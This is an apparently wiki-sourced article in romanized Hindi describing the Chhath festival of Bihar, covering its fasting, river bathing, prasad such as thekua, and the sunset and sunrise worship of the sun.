chhath bihar ka pramukh tyauhar hai. chhath ka tyauhar bhagavan soory ko dharati par dhan–dhany ki prachurata ke lie dhanyavad dene ke lie manaya jata hai. log apani vishesh ichchhaoan ki poorti ke lie bhi is parv ko manate haian. parv ka ayojan mukhyatah ganga ke tat par hota hai aur kuchh gaanvoan mean jahaan par ganga nahian pahuanch pati hai, vahaan par mahilaean chhote talaboan athava pokharoan ke kinare hi dhoomadham se is parv ko manati haian.

chhath mahotsav aur dharmik karmakand

is tyauhar par n to kisi mandir mean pooja hetu jaya jata hai, aur n hi ghar ki koee vishesh safaee ki jati hai. isase aisa pratit hota hai ki yah parv bahut hi asani se ya bina kisi karmakand ke mana liya jata hai. lekin aisa nahian hai, balki is tyauhar par itane karmakand hote haian ki vishesh anushthanoan ki tulana mean to madhyakalin phraansisi vidhan bhi tuchchh pratit hoange.

snan evan upavas

saandhy sooryapooja ke ek din pahale, shraddhalu shuddhikaran ke lie vishesharoop se ganga mean dubaki lagate haian tatha ganga ka pavitr jal arpan hetu ghar sath late haian. poore din mean upavas rakha jata hai tatha shraddhalu der sham tak pooja ke bad hi upavas to date haian.

prasad evan arpan ki vastuean

chaval ka halua, poo di tatha kela—ye hi is din ki vishesh bhojan samagri haian. arpan ke pashchat inhian bhojy padarthoan ko mitroan evan sambandhiyoan mean baanta jata hai. log b di hi shraddha se ise khate haian. [[chitr:Chhath-Puja-2.jpg|thumb|left|chhathapooja, arunachal pradesh]]

shubh din-sanjha vat

doosare din chaubis ghante ka upavas prarambh hota hai. dinabhar prasad banane ki taiyari hoti hai tatha sandhya ko bhaktagan chhath maiya ka git gate hue nadi tat, jalakund ya talab par pahuanch jate haian. vahaan par ast hote hue soory ko uparyukt prasad ka arpan kiya jata hai. ratri ke samay shraddhalu ghar lautate haian, jahaan par ek any mahotsav pratiksharat hota hai. ganne ki tahaniyoan se bane ek chhatr ke niche dipayukt mitti ke hathi v prasad se bhare bartan rakhe jate haian. shraddhalu upavas ke samay jal bhi grahan nahian karate haian. sooryoday se thik pahala, bhaktagan nadi tat ki or punah chhath maiya ke git gate hue prasthan karate haian tatha udayaman soory ki upasana archana karate haian. prarthana ke pashchat pratyek vyakti ko prasad pradan kiya jata hai. is prasad mean vishesh roop se patthar ki sil par pise hue ate ka prayog hota hai. is ate ko der tak tala jata hai tatha isamean mitha dalakar isaki golakar gaththiyaan banayi jati haian, jise "thekua" kahate haian. isake alava is vishesh prasad mean aangoor, poora nariyal, kele v masoor ki dal ke dane bhi hote haian. pooja ke samay ye sabhi vastuean baans ki ardhagolakar tokariyoan mean rakhi jati haian. in tokariyoan ka "soop" kahate haian.

rang-biranga utsav hai

chhathaparv atyant rang–biranga utsav hai, jisamean shraddhaluoan ko naye vastr dharan karana avashyak hota hai. ghar v nadi ke tat par sangit ke sur bhakti v lokabhasha se mahak uthate haian. patana mean lakhoan log ganga ke tat par miloan lambi kataroan mean baithe rahate haian. parv se utpann yah apasi mel–jol anootha hi pratit hota hai.

niyam evan vrat palan

jaise hi dipavali ka anand shant hota dikhaee p data hai, chhath ki chhata khil uthati hai. praudh vivahit striyaan hi sabhi taiyariyaan karati haian. ek or ayu mean kam striyaan v bachche ghar ke any karyoan ka sambhalate haian, doosari or praudh striyaan un vastuoan ki bhali–bhaanti safaee-dhulaee karati haian, jinaka prayog pooja, prasad mean hota hai. sabhi vastuoan ki chahe vah rasoee ka choolha ho, karachhul ho, pakane mean prayog ane vali pak d ho ya bhoonane ka patr-sabaki poori tarah se safaee ki jati hai. naye pise hue chavaloan ki leee banaee jati hai. sookhi meva v nariyal ke tuk doan ko svad badhane ke lie prayog kiya jata hai. inako ate mean mila kar laddoo banae jate haian. paramparik vyanjan 'thekua' gehooan ke m de hue ate ko vibhinn akaroan mean katakar banaya jata hai. isake lie kashth ke saanchoan ka bhi prayog kiya jata hai. tatpashchat ise gadhe bhoore rang ka hone tak tala jata hai. talane ke bad yah atyant kurakura ho jata hai tatha b de hi svad se khaya jata hai. pashchim ke deshoan mean lokapriy vyanjan "kuki" ki bhaanti hi isamean ghar ka bana makkhan, bahut sa gu d tatha nariyal dala jata hai.

is prasad ko banane ke lie grihasth praudh mahila kuchh niyamoan ka palan karati hai. jaise- vah paka hua khana nahian khati tatha sile hue vastr nahian pahanatian. rasoee mean jane se pahale pratyek vyakti ka snan karana avashyak hota hai.  

saandhy poojan ka mahamela

[[chitr:Chhath-Puja.jpg|thumb|250px|chhathapooja, arunachal pradesh]] samavet svar mean lokapriy bhakti sangit gate hue logoan ke chhote–chhote samooh pratyek ghar se nikalate haian aur nadi tat tak pahuanchate–pahuanchate ye juloos ek vishal janasamooh ka roop le lete haian. juloos mean sammilit purush apane vaksh ko nagn rakhate haian tatha prasad ko baans ki chhoti–chhoti tokariyoan mean lekar chalate haian. in tokariyoan ko jane–anajane jootha hone se bachane ke lie ooanchaee par rakha jata hai. in tokariyoan mean laddoo, thekua tatha mausami phal hote haian. nariyal, kele ke guchchhe, ek-do santare ityadi ko haldi mean range kap de se dhanka jata hai. in padarthoan ke atirikt ek mitti ka dipak bhi in tokariyoan mean rakha jata hai.

jaise hi sooryast hota hai, prarthana-pooja arambh ho jati hai. nadi tat par kisi ka phisalana ya koee bhool karana ek daivik sankat ka pratik mana jata hai. navashit mean pashchim ke ojasvi akash lalat par shraddha–bhakti–prem ka vaangmay drishy prakashit ho uthata hai- sahasroan uthe hast dharan karate haian, baans ki thaliyaan v tokariyaan. madhyam lau mean prakashit dhake hue dipak mantrochcharit vatavaran ko dedipyaman kar dete haian. pal bitata hai, mukhakritiyaan dhoomil ho uthati haian aur aandhera hote hi janasamooh nadi tat se vapas ghar lautana prarambh karata hai.

navodit soory ki archana ka mahotsav

astachal soory ko shraddhajanli pradan karane ke pashchat ab samay hota hai, sooryoday prarthana ki taiyari ka. yah pooja vidhan ka abhinn aang hai. nadi tat ki or yatra usha se hi prarambh ho jati hai. krishnapaksh ke chandrama ke karan bahar akash marg vriksh ki bhaanti kala pratit hota hai. os se bhigi ghas v pravahit hote jal ki dhvani hi nadi tat nikat hone ka sanket deti hai. is samay sabhi poorv ki or mukh karate haian aur nadi mean snan ke lie age badhate haian. isi bich tokariyoan ko ek asthaee mandap ke niche surakshit rakha jata hai. is mandap ko taza upaje ganne ki tahaniyoan se banaya jata hai. isake lie ek vishesh dhaancha banaya jata hai, tatha isake konoan ko hathi v pakshi ke roop mean banae mitti ke dipakoan se sajaya jata hai. nirmalata v shuddhi rakhane v kroor duratmaoan ko door rakhane ke lie chandan ka lep, sindoor, bhige chaval, phal v pushp bhi range hue lal sooti vastr ke bhitar rakhe jate haian. jaise hi soory ki kiranean udit hoti haian, sa di v dhoti pahane stri–purush uthale pani mean kood p date haian. pair jamakar ye log jal ki atishitalata ko bhool jate haian tatha rrigvaidik ke us kalatit mantr, jo vishesh roop se soory ke lie hai - gayatri mantr ka uchcharan karate hue snan kar soory ki shraddha se pooja karana prarambh karate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aj ka bihar
  2. aj ka gujarat

bahari k diyaan

sanbandhit lekh
